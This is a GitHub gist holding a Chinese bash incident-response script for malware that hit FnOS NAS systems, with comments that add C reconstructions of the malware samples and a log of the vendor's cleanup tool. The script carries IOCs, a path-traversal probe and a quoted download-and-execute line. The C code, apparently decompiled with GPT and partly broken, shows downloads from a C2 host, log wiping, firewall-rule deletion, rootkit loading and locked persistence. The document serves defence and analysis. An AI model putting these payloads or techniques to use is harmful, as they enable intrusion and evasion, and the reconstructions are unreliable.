-
-
Save luodaoyi/3317b3b584ce173bff15d76e7797bcda to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ========================================================== | |
| # FnOS 安全应急处置工具(交互式 · v2.1 精准版) | |
| # ========================================================== | |
| # v2.1: | |
| # - IOC 分级:STRICT / LOOSE,严格特征才参与删除/修复 | |
| # - system_startup.sh 精准删除恶意行,避免误删正常 wget | |
| # - 增加 cron 持久化排查 | |
| # - 增加哈希型 systemd 服务名检测 | |
| # - 文件隔离增加命中原因,进程清理更收敛 | |
| # ========================================================== | |
| LOG_FILE="/var/log/fnos_security_fix.log" | |
| BACKUP_DIR="/root/fnos_quarantine_$(date +%F_%H%M%S)" | |
| # --- 威胁情报特征库 (IOCs) --- | |
| # 高置信度特征(可用于删除/修复) | |
| STRICT_REGEX="45\.95\.212\.102|151\.240\.13\.91|turmp|gots|trim_https_cgi|snd_pcap|killaurasleep|8f2226523c594b2e17d68a05dc12702132bb1859fc4b01af378208ac8a2547dc" | |
| # 宽松特征(用于检测提示,不直接作为删除依据) | |
| LOOSE_REGEX="$STRICT_REGEX|bkd|bkd2|57132" | |
| MALICIOUS_IPS=("45.95.212.102" "151.240.13.91") | |
| MALICIOUS_DOMAINS=("xd.killaurasleep.top") | |
| MALICIOUS_FILES=("bkd" "bkd2" "8f2226523c594b2e17d68a05dc12702132bb1859fc4b01af378208ac8a2547dc") | |
| SCAN_DIRS=( | |
| "/usr/bin" | |
| "/usr/sbin" | |
| "/usr/trim" | |
| "/tmp" | |
| "/var/tmp" | |
| "/fnos/usr/trim" | |
| "/root" | |
| ) | |
| # ---------------- 基础函数 ---------------- | |
| need_root() { | |
| if [ "$EUID" -ne 0 ]; then | |
| echo "❌ 请使用 root 权限运行(sudo -i)" | |
| exit 1 | |
| fi | |
| } | |
| pause() { | |
| read -rp "👉 按回车继续..." | |
| } | |
| confirm() { | |
| read -rp "⚠️ $1 (y/N): " ans | |
| [[ "$ans" =~ ^[yY]$ ]] | |
| } | |
| log_init() { | |
| exec > >(tee -a "$LOG_FILE") 2>&1 | |
| mkdir -p "$BACKUP_DIR" | |
| chmod 700 "$BACKUP_DIR" | |
| } | |
| banner() { | |
| clear | |
| cat <<'EOF' | |
| ==================================================== | |
| FnOS 安全应急处置工具 v2.1 (精准 IOC 版) | |
| ==================================================== | |
| ⚠️ 覆盖威胁: gots / trim / snd_pcap / bkd / killaurasleep | |
| 📌 操作逻辑: 隔离文件 -> 阻断网络 -> 清理服务 -> 修复启动项 | |
| ==================================================== | |
| EOF | |
| } | |
| # ---------------- 检测模块 ---------------- | |
| path_traversal_check() { | |
| echo "🔍 [1] 检测路径穿越漏洞..." | |
| URL="http://127.0.0.1:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../etc/passwd" | |
| if curl -s --max-time 3 "$URL" | grep -q "root:x:0:0"; then | |
| echo "❌ [严重] 存在路径穿越漏洞(建议立即升级 FnOS 系统)" | |
| else | |
| echo "✅ 未触发路径穿越漏洞" | |
| fi | |
| } | |
| infection_scan() { | |
| echo "🔍 [2] 扫描是否已中招(基于最新情报)..." | |
| local hit=0 | |
| # 1. 检查内核模块 | |
| if lsmod | grep -q snd_pcap; then | |
| echo "❌ 已加载恶意内核模块: snd_pcap" | |
| hit=1 | |
| fi | |
| # 2. 检查恶意进程(基于文件名) | |
| for proc in "${MALICIOUS_FILES[@]}"; do | |
| if pgrep -f "$proc" >/dev/null; then | |
| echo "❌ 发现疑似恶意进程正在运行: $proc" | |
| hit=1 | |
| fi | |
| done | |
| # 3. 检查恶意 Systemd 服务文件内容 | |
| if grep -RqsE "$STRICT_REGEX" /etc/systemd/system/ 2>/dev/null; then | |
| echo "❌ 在 Systemd 服务文件中发现恶意特征" | |
| hit=1 | |
| fi | |
| # 4. 检查哈希型服务名 | |
| for svc in /etc/systemd/system/*.service; do | |
| [ ! -f "$svc" ] && continue | |
| base=$(basename "$svc") | |
| if [[ "$base" =~ ^[0-9a-f]{64}\.service$ ]]; then | |
| echo "❌ 发现可疑哈希服务名: $base" | |
| hit=1 | |
| fi | |
| done | |
| # 5. 特征扫描(关键位置,使用 STRICT) | |
| if grep -RqsE "$STRICT_REGEX" /fnos/usr/trim /etc/rc.local /etc/ld.so.preload 2>/dev/null; then | |
| echo "❌ 在系统关键位置发现恶意特征字符串" | |
| hit=1 | |
| fi | |
| # 6. cron 持久化检查 | |
| if grep -RqsE "$STRICT_REGEX" /etc/crontab /etc/cron.d 2>/dev/null; then | |
| echo "❌ 在系统级 cron 中发现恶意特征" | |
| hit=1 | |
| fi | |
| if crontab -l 2>/dev/null | grep -Eq "$STRICT_REGEX"; then | |
| echo "❌ 在 root 用户 crontab 中发现恶意特征" | |
| hit=1 | |
| fi | |
| if [ "$hit" -eq 0 ]; then | |
| echo "✅ 未发现明显入侵迹象" | |
| else | |
| echo "⚠️ 系统疑似已被入侵(建议执行自动修复模式)" | |
| fi | |
| } | |
| # ---------------- 修复模块 ---------------- | |
| block_network() { | |
| echo "🛑 [3] 阻断恶意通信..." | |
| # 备份 hosts | |
| cp /etc/hosts "$BACKUP_DIR/hosts.bak" 2>/dev/null | |
| # 1. IP 封禁 (NFT / iptables) | |
| if command -v nft >/dev/null; then | |
| nft list table inet fnos_guard >/dev/null 2>&1 || nft add table inet fnos_guard | |
| nft list chain inet fnos_guard output >/dev/null 2>&1 || \ | |
| nft add chain inet fnos_guard output { type filter hook output priority 0 \; } | |
| for ip in "${MALICIOUS_IPS[@]}"; do | |
| nft add rule inet fnos_guard output ip daddr "$ip" drop 2>/dev/null | |
| done | |
| echo " - [防火墙] 已封禁恶意 IP (nftables)" | |
| elif command -v iptables >/dev/null; then | |
| for ip in "${MALICIOUS_IPS[@]}"; do | |
| iptables -C OUTPUT -d "$ip" -j DROP 2>/dev/null || \ | |
| iptables -I OUTPUT -d "$ip" -j DROP | |
| done | |
| echo " - [防火墙] 已封禁恶意 IP (iptables)" | |
| else | |
| echo " - 未检测到 nft/iptables,跳过 IP 封禁" | |
| fi | |
| # 2. 域名 Sinkhole (Hosts 劫持) | |
| for domain in "${MALICIOUS_DOMAINS[@]}"; do | |
| if ! grep -q "$domain" /etc/hosts; then | |
| echo "127.0.0.1 $domain" >> /etc/hosts | |
| echo " - [Hosts] 已劫持域名: $domain" | |
| else | |
| echo " - [Hosts] 域名已劫持: $domain" | |
| fi | |
| done | |
| echo "✅ 网络阻断策略已应用" | |
| } | |
| kill_process() { | |
| echo "🔪 [4] 终止恶意进程..." | |
| # 1. 基于文件名的进程 | |
| for proc in "${MALICIOUS_FILES[@]}"; do | |
| pids=$(pgrep -f "$proc") | |
| if [ -n "$pids" ]; then | |
| echo " - 正在终止进程: $proc (PID: $pids)" | |
| kill -9 $pids 2>/dev/null | |
| fi | |
| done | |
| # 2. 更精准:命令行中同时包含关键 IOC 的进程 | |
| pgrep -af "bkd" 2>/dev/null | grep -E "killaurasleep|151\.240\.13\.91" | awk '{print $1}' | xargs -r kill -9 2>/dev/null | |
| pgrep -af "turmp" 2>/dev/null | awk '{print $1}' | xargs -r kill -9 2>/dev/null | |
| echo "✅ 进程清理完成" | |
| } | |
| clean_systemd_services() { | |
| echo "🧹 [5] 清理恶意 Systemd 服务..." | |
| # 1. 基于内容 IOC 的服务文件 | |
| grep -lE "$STRICT_REGEX" /etc/systemd/system/*.service 2>/dev/null | while read -r service_file; do | |
| [ -z "$service_file" ] && continue | |
| service_name=$(basename "$service_file") | |
| echo " 🚨 发现恶意服务(内容命中): $service_name" | |
| systemctl stop "$service_name" 2>/dev/null | |
| systemctl disable "$service_name" 2>/dev/null | |
| chattr -i "$service_file" 2>/dev/null | |
| cp "$service_file" "$BACKUP_DIR/" | |
| rm -f "$service_file" | |
| echo " - 已移除并备份服务文件" | |
| done | |
| # 2. 基于哈希型服务名的检测 | |
| for service_file in /etc/systemd/system/*.service; do | |
| [ ! -f "$service_file" ] && continue | |
| service_name=$(basename "$service_file") | |
| if [[ "$service_name" =~ ^[0-9a-f]{64}\.service$ ]]; then | |
| echo " 🚨 发现可疑哈希服务名: $service_name" | |
| systemctl stop "$service_name" 2>/dev/null | |
| systemctl disable "$service_name" 2>/dev/null | |
| chattr -i "$service_file" 2>/dev/null | |
| cp "$service_file" "$BACKUP_DIR/" | |
| rm -f "$service_file" | |
| echo " - 已移除并备份哈希服务文件" | |
| fi | |
| done | |
| systemctl daemon-reload | |
| echo "✅ Systemd 服务清理完成" | |
| } | |
| scan_and_quarantine() { | |
| echo "🔎 [6] 深度扫描并隔离文件..." | |
| for dir in "${SCAN_DIRS[@]}"; do | |
| [ ! -d "$dir" ] && continue | |
| echo " 正在扫描目录: $dir" | |
| find "$dir" -maxdepth 3 -type f -executable -mtime -30 2>/dev/null | while read -r f; do | |
| [ "$f" == "$0" ] && continue | |
| filename=$(basename "$f") | |
| match=0 | |
| reason="" | |
| # 1. 文件名命中恶意列表(高置信度) | |
| for bad_name in "${MALICIOUS_FILES[@]}"; do | |
| if [[ "$filename" == "$bad_name" ]]; then | |
| match=1 | |
| reason="name-hit:$bad_name" | |
| break | |
| fi | |
| done | |
| # 2. 内容命中严格 IOC(更安全) | |
| if [ $match -eq 0 ]; then | |
| if strings "$f" 2>/dev/null | grep -Eq "$STRICT_REGEX"; then | |
| match=1 | |
| reason="content-hit:STRICT" | |
| fi | |
| fi | |
| # 3. 可选:内容命中组合 IOC(网络 + 域名) | |
| if [ $match -eq 0 ]; then | |
| if strings "$f" 2>/dev/null | grep -q "151\.240\.13\.91" && \ | |
| strings "$f" 2>/dev/null | grep -q "killaurasleep"; then | |
| match=1 | |
| reason="content-hit:IP+domain" | |
| fi | |
| fi | |
| if [ $match -eq 1 ]; then | |
| echo "🚨 发现威胁文件: $f (原因: $reason)" | |
| chattr -i "$f" 2>/dev/null | |
| fuser -k "$f" 2>/dev/null | |
| mv "$f" "$BACKUP_DIR/$(basename "$f")_$(date +%s).infected" | |
| echo " -> 已隔离至备份目录" | |
| fi | |
| done | |
| done | |
| echo "✅ 文件扫描完成" | |
| } | |
| remove_kernel_module() { | |
| echo "🧠 [7] 清理恶意内核模块..." | |
| if lsmod | grep -q snd_pcap; then | |
| echo " - 发现 snd_pcap,尝试卸载..." | |
| modprobe -r snd_pcap 2>/dev/null || rmmod -f snd_pcap 2>/dev/null | |
| if lsmod | grep -q snd_pcap; then | |
| echo "❌ 卸载失败,可能需要重启系统进入恢复模式处理" | |
| else | |
| echo "✅ snd_pcap 已卸载" | |
| fi | |
| else | |
| echo "ℹ️ 未发现 snd_pcap 模块" | |
| fi | |
| } | |
| fix_persistence_common() { | |
| echo "🔧 [8] 修复通用持久化配置..." | |
| # 修复 ld.so.preload(仅删除 STRICT 命中的行) | |
| if [ -f /etc/ld.so.preload ]; then | |
| if grep -Eq "$STRICT_REGEX" /etc/ld.so.preload; then | |
| echo " - 修复 /etc/ld.so.preload" | |
| chattr -i /etc/ld.so.preload 2>/dev/null | |
| cp /etc/ld.so.preload "$BACKUP_DIR/ld.so.preload.bak" | |
| sed -i -E "/$STRICT_REGEX/d" /etc/ld.so.preload | |
| [ ! -s /etc/ld.so.preload ] && rm -f /etc/ld.so.preload | |
| fi | |
| fi | |
| # 修复 rc.local(仅删除 STRICT 命中的行) | |
| if [ -f /etc/rc.local ]; then | |
| if grep -Eq "$STRICT_REGEX" /etc/rc.local; then | |
| echo " - 修复 /etc/rc.local" | |
| chattr -i /etc/rc.local 2>/dev/null | |
| cp /etc/rc.local "$BACKUP_DIR/rc.local.bak" | |
| sed -i -E "/$STRICT_REGEX/d" /etc/rc.local | |
| fi | |
| fi | |
| # 修复 cron(备份后删除 STRICT 命中的行) | |
| if [ -f /etc/crontab ]; then | |
| if grep -Eq "$STRICT_REGEX" /etc/crontab; then | |
| echo " - 修复 /etc/crontab" | |
| cp /etc/crontab "$BACKUP_DIR/crontab.bak" | |
| sed -i -E "/$STRICT_REGEX/d" /etc/crontab | |
| fi | |
| fi | |
| if ls /etc/cron.d/* >/dev/null 2>&1; then | |
| for f in /etc/cron.d/*; do | |
| [ ! -f "$f" ] && continue | |
| if grep -Eq "$STRICT_REGEX" "$f"; then | |
| echo " - 修复 cron.d: $f" | |
| cp "$f" "$BACKUP_DIR/$(basename "$f").bak" | |
| sed -i -E "/$STRICT_REGEX/d" "$f" | |
| fi | |
| done | |
| fi | |
| if crontab -l 2>/dev/null | grep -Eq "$STRICT_REGEX"; then | |
| echo " - 修复 root crontab" | |
| crontab -l > "$BACKUP_DIR/root.crontab.bak" | |
| crontab -l | sed -E "/$STRICT_REGEX/d" | crontab - | |
| fi | |
| echo "✅ 持久化配置检查完成" | |
| } | |
| fix_fnos_system_startup() { | |
| FILE="/usr/trim/bin/system_startup.sh" | |
| echo "🔧 [9] 修复 FnOS 特定启动项..." | |
| [ ! -f "$FILE" ] && { echo "ℹ️ 未找到 $FILE,跳过"; return; } | |
| # 仅用于判断是否疑似被篡改 | |
| if grep -Eq "151\.240\.13\.91|turmp|killaurasleep" "$FILE"; then | |
| echo "❌ 在 system_startup.sh 中发现疑似恶意代码" | |
| chattr -i "$FILE" 2>/dev/null | |
| cp "$FILE" "$BACKUP_DIR/system_startup.sh.bak" | |
| # 精准删除已知恶意注入行: | |
| # wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp | |
| sed -i '\|wget http://151\.240\.13\.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp|d' "$FILE" | |
| # 兼容未来 turmp 变种(仍然保持行为链特征) | |
| sed -i '/wget .*turmp .*chmod .*turmp .*\/tmp\/turmp/d' "$FILE" | |
| echo "✅ 恶意启动行已清除(原文件已备份)" | |
| else | |
| echo "✅ system_startup.sh 未发现异常特征" | |
| fi | |
| } | |
| # ---------------- 主流程 ---------------- | |
| need_root | |
| log_init | |
| banner | |
| echo "请选择操作模式:" | |
| echo " 1) 仅检测(推荐先跑,无风险)" | |
| echo " 2) 自动修复(执行阻断、清理、修复)" | |
| echo " 3) 仅封禁网络(防火墙 + Hosts)" | |
| echo " 4) 退出" | |
| echo | |
| read -rp "请输入选项 [1-4]: " MODE | |
| case "$MODE" in | |
| 1) | |
| path_traversal_check | |
| infection_scan | |
| ;; | |
| 2) | |
| echo "----------------------------------------------------" | |
| echo "⚠️ 注意:修复过程中会停止恶意进程并移动文件。" | |
| confirm "建议您已备份重要数据。是否开始执行?" || exit 0 | |
| echo "----------------------------------------------------" | |
| block_network # 先断网,防止下载新样本 | |
| kill_process # 杀进程,防止锁文件 | |
| clean_systemd_services # 清理 systemd 服务(含哈希服务名) | |
| remove_kernel_module # 卸载内核模块 | |
| fix_persistence_common # 修复 rc.local / ld.so.preload / cron | |
| fix_fnos_system_startup # 修复 FnOS 特有脚本 | |
| scan_and_quarantine # 最后扫描残留文件 | |
| ;; | |
| 3) | |
| block_network | |
| ;; | |
| *) | |
| echo "👋 已退出" | |
| exit 0 | |
| esac | |
| echo | |
| echo "====================================================" | |
| echo "✅ 操作已结束" | |
| echo "📁 隔离文件目录: $BACKUP_DIR" | |
| echo "📄 详细日志记录: $LOG_FILE" | |
| echo "💡 安全建议:" | |
| echo " 1. 立即修改 SSH 密码和 FnOS 后台密码" | |
| echo " 2. 检查 /root/.ssh/authorized_keys 是否有陌生公钥" | |
| echo " 3. 建议重启系统以确保所有内存加载项已清除" | |
| echo " 4. 如有疑虑,可将日志与隔离文件交给安全团队复核" | |
| echo "====================================================" |
http://43.198.11.122/turmp 使用GPT反编译回来的内容
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
/*
* 警告:此代码仅用于安全分析和研究。
* 根据二进制文件中的字符串和指令重构。
*/
// 病毒使用的指令和路径
const char* PAYLOAD_URL = "http://43.198.11.122/turmp";
const char* PAYLOAD_PATH = "/tmp/turmp";
const char* SERVICE_PATH = "/etc/systemd/system/dockers.service";
const char* DOCKERS_BIN = "/usr/bin/dockers";
// 1. 修改防火墙,放行自身通信并隐藏痕迹
void modify_firewall() {
// 对应二进制中的 iptables 和 nft 字符串
system("iptables -t filter -F"); // 清空防火墙规则
system("nft list ruleset | grep ... | sed ... | sh"); // 动态删除 nftables 监控规则
}
// 2. 清除系统日志,掩盖入侵痕迹
void wipe_logs() {
// 对应二进制中大量的 /var/log/ 字符串
const char* logs[] = {
"/var/log/secure", "/var/log/messages", "/var/log/wtmp",
"/var/log/btmp", "/var/log/lastlog", "/var/log/audit/audit.log",
"/usr/trim/logs/*.log"
};
for(int i=0; i<7; i++) {
char cmd[128];
sprintf(cmd, "rm -rf %s", logs[i]);
system(cmd);
}
}
// 3. 实现持久化:伪装成 dockers 服务
void setup_persistence() {
// 对应二进制中 [Service] 和 Type=oneshot 等字符串
FILE *f = fopen(SERVICE_PATH, "w");
if (f) {
fprintf(f, "[Unit]\nDescription=dockers Service\nAfter=network-online.target\n\n"
"[Service]\nType=oneshot\nExecStart=%s\nRemainAfterExit=yes\nRestart=no\n\n"
"[Install]\nWantedBy=multi-user.target\n", DOCKERS_BIN);
fclose(f);
}
// 设置文件不可删除属性 (chattr +i)
system("chattr +i /etc/systemd/system/dockers.service");
system("systemctl enable dockers.service > /dev/null 2>&1");
}
// 4. 逃避检测:改变自身 Hash 值
void anti_forensics() {
// 对应二进制中的 /dev/urandom 和 >> 逻辑
// 往自身文件末尾添加16字节随机数,导致MD5/SHA改变,逃避杀毒软件全盘扫描
system("head -c 16 /dev/urandom >> /usr/bin/dockers");
}
// 5. 内核级隐藏 (Rootkit 行为)
void install_rootkit() {
// 对应二进制中的 async_memcpy.ko, insmod, modprobe
// 尝试下载并加载一个恶意的内核模块来隐藏进程
system("cd /tmp/kit ; wget http://43.198.11.122/async_memcpy.ko ; insmod async_memcpy.ko");
}
int main(int argc, char **argv) {
// 检查是否已经是 root
if (getuid() != 0) return 1;
modify_firewall();
wipe_logs();
// 执行远程下载并运行主程序
// 对应脚本中的 wget http://.../turmp -O /tmp/turmp
if (system("wget http://43.198.11.122/turmp -O /tmp/turmp") == 0) {
system("chmod 777 /tmp/turmp");
system("/tmp/turmp &");
}
setup_persistence();
install_rootkit();
anti_forensics();
return 0;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/*
* 声明:此代码仅用于安全研究与威胁情报分析。
* 该程序是针对飞牛OS(基于 Debian)环境定制开发的恶意后门。
*/
const char* C2_SERVER = "43.198.11.122";
// 1. 极其激进的日志擦除:清空几乎所有可能记录入侵行为的日志
void wipe_all_logs() {
const char* targets[] = {
"/var/log/accountsrv/", "/var/log/apps/", "/var/log/apt/",
"/var/log/postgresql/", "/var/log/trim_app_center/", "/var/log/trim_tfa/",
"/var/log/secure*", "/var/log/messages*", "/var/log/wtmp",
"/var/log/btmp", "/var/log/lastlog", "/var/log/audit/audit.log",
"/run/log/journal/", "/usr/trim/logs/"
};
for (int i = 0; i < 14; i++) {
char cmd[256];
// 使用 rm -rf 彻底删除,或者定向到 /dev/null
sprintf(cmd, "rm -rf %s >/dev/null 2>&1", targets[i]);
system(cmd);
}
}
// 2. 防火墙劫持:动态删除针对恶意 IP 的拦截规则
void manipulate_firewall(const char* malicious_ip) {
// 针对 iptables:寻找包含该 IP 的规则并将其 -A (Add) 替换为 -D (Delete) 后执行
char ip_cmd[256];
sprintf(ip_cmd, "iptables -t filter -S | grep %s | sed 's/^-A/-D/' | sh", malicious_ip);
system(ip_cmd);
// 针对 nftables:获取句柄并删除相关规则
char nft_cmd[512];
sprintf(nft_cmd, "nft list ruleset -a | grep %s | sed -n 's/.*table \\([^ ]*\\) \\([^ ]*\\).*handle \\([0-9]*\\).*/nft delete rule \\1 \\2 handle \\3/p' | sh", malicious_ip);
system(nft_cmd);
}
// 3. 内核级持久化(Rootkit):现场编译恶意驱动
void install_kernel_rootkit() {
// 探测并安装开发环境
system("apt install gcc make -y >/dev/null 2>&1");
// 下载源代码并编译
system("mkdir -p /tmp/kit");
system("cd /tmp/kit ; wget http://43.198.11.122/async_memcpys.c");
system("cd /tmp/kit ; wget http://43.198.11.122/Makefile");
system("cd /tmp/kit ; make");
// 移动模块到系统目录并加载
system("cp /tmp/kit/async_memcpys.ko /lib/modules/$(uname -r)/");
system("echo \"async_memcpys\" >> /etc/modules");
system("depmod -a ; modprobe async_memcpys");
// 清理现场
system("rm -rf /tmp/kit");
}
// 4. 伪装系统服务:创建不可删除的服务
void setup_fake_service() {
const char* svc_path = "/etc/systemd/system/dockers.service";
FILE* f = fopen(svc_path, "w");
if (f) {
fprintf(f, "[Unit]\nDescription=dockers Service\nAfter=network-online.target\n\n"
"[Service]\nType=oneshot\nExecStart=/usr/bin/dockers\n"
"RemainAfterExit=yes\nRestart=no\n\n"
"[Install]\nWantedBy=multi-user.target\n");
fclose(f);
}
// 使用 chattr +i 锁定文件,这就是你为什么 rm 不掉的原因
system("chattr +i /etc/systemd/system/dockers.service");
system("systemctl daemon-reload");
system("systemctl enable dockers.service > /dev/null 2>&1");
}
// 5. 自身多态化:改变文件哈希逃避检测
void change_hash(const char* filename) {
// 往文件末尾追加 16 字节随机数
char cmd[128];
sprintf(cmd, "head -c 16 /dev/urandom >> %s", filename);
system(cmd);
}
int main() {
wipe_all_logs();
manipulate_firewall("43.198.11.122");
// 下载核心后门组件
system("wget http://43.198.11.122/dockers -O /usr/bin/dockers");
system("chmod 777 /usr/bin/dockers");
setup_fake_service();
install_kernel_rootkit();
// 执行最终载荷
system("/usr/bin/dockers --start");
return 0;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
/*
* 分析报告:此程序是病毒的“守护进程”
* 目标系统:飞牛OS (FNOS) 及其他基于 Debian 的 NAS 系统
* 关联 IP: 43.198.11.122, 20.89.168.131
*/
// 恶意配置信息
const char* FAKE_SERVICE_NAME = "WatchDog"; // 伪装成看门狗
const char* C2_IP = "20.89.168.131";
const char* SYSTEMD_PATH = "/etc/systemd/system/%s.service";
// 1. 系统工具劫持 (极其危险)
void hijack_system_tools() {
// 对应数据中 mv /usr/bin/cat /usr/bin/cat2 的逻辑
// 目的是防止管理员使用 cat 查看系统日志或恶意脚本
system("mv /usr/bin/cat /usr/bin/cat2 >/dev/null 2>&1");
// 之后它可能会用一个修改过的 cat 替换原位,或者干脆让你无法使用
}
// 2. 终止系统原生监控 (让飞牛OS面板失效)
void kill_security_services() {
// 对应数据中 pkill -f 'network_service|resmon_service'
// network_service 和 resmon_service 是飞牛OS或类似系统用于监控流量和资源的
// 杀掉它们,用户在 Web 面板就看不到异常的 CPU 或网络占用了
system("pkill -f 'network_service|resmon_service' >/dev/null 2>&1");
}
// 3. 网络扫描与回传
void network_activity() {
// 读取 /proc/net/tcp 监控系统的网络连接
// 检查 1.1.1.1 (Cloudflare DNS) 判断联网状态
// 连接到控制端 20.89.168.131
printf("Connecting to C2: %s...\n", C2_IP);
}
// 4. 动态生成并锁定持久化服务
void ensure_persistence(char* service_name) {
char path[128];
sprintf(path, "/etc/systemd/system/%s.service", service_name);
FILE *f = fopen(path, "w");
if (f) {
fprintf(f, "[Unit]\nDescription=AutoStart Service\nAfter=network-online.target\n\n"
"[Service]\nType=oneshot\nExecStart=/usr/bin/dockers --daemon\n"
"RemainAfterExit=yes\nRestart=always\n\n" // 设置为始终重启
"[Install]\nWantedBy=multi-user.target\n");
fclose(f);
}
// 关键点:这就是你删不掉的原因
system("chattr +i /etc/systemd/system/*.service");
system("systemctl enable %s", service_name);
}
// 5. 进程隐藏与看门狗逻辑
void watchdog_logic() {
while(1) {
// 检查自身进程是否被发现
// 检查 /sbin/gots 是否存在 (可能是另一个后门组件)
// 再次执行劫持逻辑
hijack_system_tools();
sleep(60);
}
}
int main(int argc, char **argv) {
if (getuid() != 0) return 1;
// 隐藏进程名 (伪装成正常进程)
strcpy(argv[0], "[watchdog/0]");
kill_security_services();
hijack_system_tools();
network_activity();
ensure_persistence("dockers");
if (fork() == 0) {
watchdog_logic();
}
return 0;
}
rpcd_lsad 重启后一会儿cpu占用非常高
http://43.198.11.122/trim_fnos
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
/*
* 警告:此代码仅用于安全研究。
* 分析对象:trim_fnos (针对飞牛OS定制的恶意安装器)
* 关联IP:43.198.11.122 (下载源), 20.89.168.131 (C2控制端)
*/
// 1. 极其详尽的日志清理列表(飞牛OS特有路径)
void wipe_system_evidence() {
const char *targets[] = {
"/var/log/accountsrv/", "/var/log/apps/", "/var/log/apt/",
"/var/log/cloud_storage_dav/", "/var/log/openvswitch/",
"/var/log/postgresql/", "/var/log/trim_app_center/",
"/var/log/trim_license/", "/var/log/trim_sac/", "/var/log/trim_tfa/",
"/var/log/trim-connect/", "/var/log/trim-sharelink/",
"/usr/trim/logs/ai_manager/", "/usr/trim/nginx/logs/",
"/var/log/secure", "/var/log/messages", "/var/log/wtmp",
"/var/log/btmp", "/var/log/lastlog", "/var/log/audit/audit.log",
"/run/log/journal/"
};
for (int i = 0; i < 21; i++) {
char cmd[256];
// 尝试删除所有系统行为日志和飞牛自有组件日志
sprintf(cmd, "rm -rf %s* >/dev/null 2>&1", targets[i]);
system(cmd);
}
}
// 2. 自动化防火墙劫持 (iptables & nftables)
void bypass_firewall(const char* ip) {
char buf[512];
// 针对传统 iptables: 找到拦截该IP的规则并反向删除 (-D)
sprintf(buf, "iptables -t filter -S | grep %s | sed 's/^-A/-D/' | sh", ip);
system(buf);
// 针对新式 nftables: 查找规则句柄(handle)并强制删除
sprintf(buf, "nft list ruleset -a | grep %s | sed -n 's/.*table \\([^ ]*\\) "
"\\([^ ]*\\).*handle \\([0-9]*\\).*/nft delete rule \\1 \\2 handle \\3/p' | sh", ip);
system(buf);
}
// 3. 动态内核模块 (Rootkit) 部署
void install_lkm_rootkit() {
// 尝试安装编译环境,以适配用户当前的内核版本
system("apt install gcc make -y >/dev/null 2>&1");
system("mkdir -p /tmp/kit");
system("cd /tmp/kit; wget http://43.198.11.122/async_memcpys.c");
system("cd /tmp/kit; wget http://43.198.11.122/Makefile");
system("make -C /tmp/kit"); // 在本地编译出 .ko 模块
// 移动并持久化内核模块
system("cp /tmp/kit/async_memcpys.ko /lib/modules/$(uname -r)/");
system("depmod -a");
system("modprobe async_memcpys");
system("echo 'async_memcpys' >> /etc/modules");
system("rm -rf /tmp/kit");
}
// 4. 核心组件部署与随机化
void deploy_payloads() {
// 下载核心后门
system("wget http://43.198.11.122/dockers -O /usr/bin/dockers");
system("chmod 777 /usr/bin/dockers");
// 这一步非常狡猾:向二进制文件追加随机数,改变MD5
system("head -c 16 /dev/urandom >> /usr/bin/dockers");
system("head -c 16 /dev/urandom >> /usr/trim/bin/trim_fnos");
}
// 5. 伪装 Systemd 服务
void create_persistent_service() {
const char* svc_content =
"[Unit]\nDescription=dockers Service\nAfter=network-online.target\n\n"
"[Service]\nType=oneshot\nExecStart=/usr/bin/dockers\n"
"RemainAfterExit=yes\nRestart=no\n\n"
"[Install]\nWantedBy=multi-user.target\n";
FILE *f = fopen("/etc/systemd/system/dockers.service", "w");
if(f) {
fputs(svc_content, f);
fclose(f);
}
// 锁定服务文件,防止用户删除
system("chattr +i /etc/systemd/system/dockers.service");
system("systemctl daemon-reload");
system("systemctl enable dockers.service");
}
int main(int argc, char **argv) {
// 隐藏进程名
if (argc > 0) strcpy(argv[0], "[kworker/u:1]");
if (getuid() != 0) return 1;
wipe_system_evidence();
bypass_firewall("43.198.11.122");
bypass_firewall("20.89.168.131");
deploy_payloads();
create_persistent_service();
install_lkm_rootkit();
// 启动最终载荷
system("/usr/bin/dockers --start &");
return 0;
}
看着有调用gcc编译过程,不过没截下来
用了官方的试试吧
root@nas:~# curl -L http://static2.fnnas.com/aptfix/trim-sec -o trim-sec && chmod +x trim-sec && ./trim-sec
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8741k 100 8741k 0 0 24.0M 0 --:--:-- --:--:-- --:--:-- 24.0M
time="2026-02-01T17:48:19+08:00" level=info msg="日志配置已应用"
time="2026-02-01T17:48:19+08:00" level=info msg="开始执行手动安全扫描..."
time="2026-02-01T17:48:19+08:00" level=info msg="初始化 Trim Security 扫描器..."
time="2026-02-01T17:48:19+08:00" level=info msg="开始执行手动安全检查..."
time="2026-02-01T17:48:19+08:00" level=warning msg="发现对官方服务的屏蔽: 0.0.0.0 update-service.test.teiron-inc.cn"
time="2026-02-01T17:48:19+08:00" level=warning msg="发现对官方服务的屏蔽: :: update-service.test.teiron-inc.cn"
time="2026-02-01T17:48:19+08:00" level=warning msg="发现对官方服务的屏蔽: 0.0.0.0 apiv2-liveupdate.fnnas.com"
time="2026-02-01T17:48:19+08:00" level=warning msg="发现对官方服务的屏蔽: :: apiv2-liveupdate.fnnas.com"
time="2026-02-01T17:48:19+08:00" level=warning msg="发现文件 /etc/hosts 有 +i 属性,正在移除..."
time="2026-02-01T17:48:19+08:00" level=info msg="成功移除文件 /etc/hosts 的 +i 属性"
time="2026-02-01T17:48:19+08:00" level=warning msg="成功清理文件 /etc/hosts 中对官方服务的屏蔽规则"
time="2026-02-01T17:48:19+08:00" level=warning msg="成功删除文件 /usr/trim/bin/liveupdate"
time="2026-02-01T17:48:19+08:00" level=info msg="正在下载 liveupdate deb 包: https://static2.fnnas.com/aptfix/liveupdate.1.0.12.deb"
time="2026-02-01T17:48:19+08:00" level=info msg="成功下载 liveupdate deb 包"
time="2026-02-01T17:48:19+08:00" level=info msg="正在安装 liveupdate..."
